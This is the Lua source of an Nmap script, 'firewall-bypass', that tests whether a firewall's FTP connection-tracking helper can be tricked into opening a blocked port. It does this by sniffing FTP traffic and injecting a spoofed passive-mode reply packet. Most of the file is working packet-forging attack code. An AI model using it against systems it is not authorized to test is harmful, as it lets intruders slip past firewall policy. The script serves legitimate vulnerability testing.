local nmap = require "nmap" local stdnse = require "stdnse" local string = require "string" local packet = require "packet" description = [[ Detects a vulnerability in netfilter and other firewalls that use helpers to dynamically open ports for protocols such as ftp and sip. The script works by spoofing a packet from the target server asking for opening a related connection to a target port which will be fulfilled by the firewall through the adequate protocol helper port. The attacking machine should be on the same network segment as the firewall for this to work. The script supports ftp helper on both IPv4 and IPv6. Real path filter is used to prevent such attacks. Based on work done by Eric Leblond. For more information, see: * http://home.regit.org/2012/03/playing-with-network-layers-to-bypass-firewalls-filtering-policy/ ]] --- -- @args firewall-bypass.helper The helper to use. Defaults to ftp. -- Supported helpers: ftp (Both IPv4 and IPv6). -- -- @args firewall-bypass.helperport If not using the helper's default port. -- -- @args firewall-bypass.targetport Port to test vulnerability on. Target port should be a -- non-open port. If not given, the script will try to find a filtered or closed port from -- the port scan results. -- -- @usage -- nmap --script firewall-bypass -- nmap --script firewall-bypass --script-args firewall-bypass.helper="ftp", firewall-bypass.targetport=22 -- -- @output -- Host script results: -- | firewall-bypass: -- |_ Firewall vulnerable to bypass through ftp helper. (IPv4) author = "Hani Benhabiles" license = "Same as Nmap--See https://nmap.org/book/man-legal.html" categories = {"vuln", "intrusive"} ftp_helper = { should_run = function(host, helperport) local helperport = helperport or 21 -- IPv4 and IPv6 are supported if nmap.address_family() ~= 'inet' and nmap.address_family() ~= 'inet6' then return false end -- Test if helper port is open local testsock = nmap.new_socket() testsock:set_timeout(1000) local status, _ = testsock:connect(host.ip, helperport) testsock:close() if not status then stdnse.debug1("Unable to connect to %s helper port.", helperport) return false end return true end, attack = function(host, helperport, targetport) local ethertype, payload local isIp4 = nmap.address_family() == 'inet' -- True if we are using IPv4. Otherwise, it is IPv6 if isIp4 then -- IPv4 payload payload = "227 Entering Passive Mode (" .. string.gsub(host.ip,"%.",",") .. "," .. ((targetport >> 8) & 0xff) .. "," .. (targetport & 0xff) .. ")\r\n" ethertype = "\x08\0" -- Ethernet Type: IPv4 else -- IPv6 payload payload = "229 Extended Passive Mode OK (|||" .. targetport .. "|)\r\n" ethertype = "\x86\xdd" -- Ethernet Type: IPv6 end helperport = helperport or 21 local function spoof_ftp_packet(host, helperport, targetport) -- Sniffs the network for src host host.ip and src port helperport local filter = "src host " .. host.ip .. " and tcp src port " .. helperport local status, l2data, l3data local timeout = 1000 local start = nmap.clock_ms() -- Start sniffing local sniffer = nmap.new_socket() sniffer:set_timeout(100) sniffer:pcap_open(host.interface, 256, true, filter) -- Until we get adequate packet while (nmap.clock_ms() - start) < timeout do local _ status, _, l2data, l3data = sniffer:pcap_receive() if status and string.find(l3data, "220 ") then break end end if not status then stdnse.debug1("pcap read timed out") return false end -- Get ethernet values local f = packet.Frame:new(l2data) local p = packet.Packet:new(l3data, #l3data) if isIp4 then if not p:ip_parse() then -- An error happened stdnse.debug1("Couldn't parse IPv4 sniffed packet.") sniffer:pcap_close() return false end else if not p:ip6_parse() then -- An error happened stdnse.debug1("Couldn't parse IPv6 sniffed packet.") sniffer:pcap_close() return false end end -- Spoof packet -- 1. Invert ethernet addresses f.frame_buf = f.mac_src .. f.mac_dst .. ethertype -- 2. Modify packet payload p.buf = string.sub(p.buf, 1, p.tcp_data_offset) .. payload -- 3. Increment IP ID field (IPv4 packets) if isIp4 then p:ip_set_id(p.ip_id + 1) end -- 4. Set TCP sequence number correctly using traffic data p:tcp_set_seq(p.tcp_seq + p.tcp_data_length) -- 5. Update all checksums and lengths if isIp4 then -- Packet length field p:ip_set_len(#p.buf) p:ip_count_checksum() else -- Payload length field p:ip6_set_plen(#p.buf - p.tcp_offset) end p:tcp_count_checksum() -- and finally, we send it. local dnet = nmap.new_dnet() dnet:ethernet_open(host.interface) dnet:ethernet_send(f.frame_buf .. p.buf) status = sniffer:pcap_receive() dnet:ethernet_close() return true end local co = stdnse.new_thread(spoof_ftp_packet, host, helperport, targetport) -- Wait for packet spoofing thread stdnse.sleep(1) -- Make connection to the target while packet the spoofing thread is sniffing for packets local socket = nmap.new_socket() socket:set_timeout(3000) local status, _ = socket:connect(host.ip, helperport) if not status then -- Problem connecting to helper port stdnse.debug1("Problem connecting to helper port %s.", tostring(helperport)) return end -- wait packet spoofing thread to finish stdnse.sleep(1.5) socket:close() return end, } -- List of helpers local helpers = { ftp = ftp_helper, -- FTP (IPv4 and IPv6) } local helper hostrule = function(host) helper = stdnse.get_script_args(SCRIPT_NAME .. ".helper") if not nmap.is_privileged() then nmap.registry[SCRIPT_NAME] = nmap.registry[SCRIPT_NAME] or {} if not nmap.registry[SCRIPT_NAME].rootfail then stdnse.verbose1("lacks privileges." ) nmap.registry[SCRIPT_NAME].rootfail = true end return false end if not host.interface then return false end if helper and not helpers[helper] then stdnse.debug1("%s helper not supported at the moment.", helper) return false end return true end action = function(host, port) local helperport = tonumber(stdnse.get_script_args(SCRIPT_NAME .. ".helperport")) local targetport = tonumber(stdnse.get_script_args(SCRIPT_NAME .. ".targetport")) local helpername if targetport then -- We should check if target port is not already open local testsock = nmap.new_socket() testsock:set_timeout(1000) local status, _ = testsock:connect(host.ip, targetport) if status then stdnse.debug1("%s target port already open.", targetport) return nil end testsock:close() else -- If not target port specified, we try to get a filtered port, -- which would be more likely blocked by a firewall before looking for a closed one. local port = nmap.get_ports(host, nil, "tcp", "filtered") or nmap.get_ports(host, nil, "tcp", "closed") if port then targetport = port.number stdnse.debug1("%s chosen as target port.", targetport) else -- No closed or filtered ports to check on. stdnse.debug1("Target port not specified and no closed or filtered port found.") return end end -- If helper chosen by user if helper then if helpers[helper].should_run(host, helperport) then helpers[helper].attack(host, helperport, targetport) else return end -- If no helper chosen manually, we iterate over table to find a suitable one. else for i, helper in pairs(helpers) do if helper.should_run(host, helperport) then helpername = i stdnse.debug1("%s chosen as helper.", helpername) helper.attack(host, helperport, targetport) break end end if not helpername then stdnse.debug1("no suitable helper found.") return nil end end -- Then we check if target port is now open. local testsock = nmap.new_socket() testsock:set_timeout(1000) local status, _ = testsock:connect(host.ip, targetport) testsock:close() if status then -- If we could connect, then port is open and firewall is vulnerable. local vulnstring = "Firewall vulnerable to bypass through " .. (helper or helpername) .. " helper. " .. (nmap.address_family() == 'inet' and "(IPv4)" or "(IPv6)") return stdnse.format_output(true, vulnstring) end end